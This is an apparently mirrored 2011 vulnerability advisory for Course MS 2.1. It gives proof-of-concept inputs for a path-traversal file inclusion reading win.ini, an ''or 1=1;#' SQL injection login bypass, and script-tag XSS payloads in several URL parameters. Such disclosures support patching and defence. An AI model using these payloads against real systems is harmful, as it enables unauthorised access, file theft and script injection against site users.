Course Registration Management System 2.1 Multiple Vulnerabilities

🗓️ 24 Feb 2011 00:00:00Reported by AutoSec ToolsType

zdt🔗 0day.today👁 9 Views

A local file inclusion vulnerability, SQL injection, and reflected cross-site scripting vulnerabilities in Course MS 2.

------------------------------------------------------------------------
Software................Course MS 2.1
Vulnerability...........Local File Inclusion
Download................http://sourceforge.net/projects/coursems
Release Date............2/14/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------
 
--Description--
 
 
A local file inclusion vulnerability in Course MS 2.1 can be exploited
to include arbitrary files.
 
 
--PoC--
 
http://localhost/coursems2_2/download_file.php?path=../../../../../../../../windows/win.ini%00
 
 
An SQL injection vulnerability in Course MS 2.1 can be exploited to
bypass authentication.
 
 
--PoC--
 
Enter the following in the username field of the login screen:
 
 
'or 1=1;#
 
A reflected cross-site scripting vulnerability in Course MS 2.1 can be
exploited to execute arbitrary JavaScript.
 
 
--PoC--
http://localhost/coursems2_2/gmap.php?lat=%3Cscript%3Ealert(0)%3C/script%3E&lon=%3Cscript%3Ealert(0)%3C/script%3E&add1=%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E&width=%3Cscript%3Ealert(0)%3C/script%3E&height=%3Cscript%3Ealert(0)%3C/script%3E
 
 
http://localhost/coursems2_2/resolve.php?add1=%3Cscript%3Ealert(0)%3C/script%3E



#  0day.today [2018-04-11]  #

24 Feb 2011 00:00Current

7.1High risk

Vulners AI Score7.1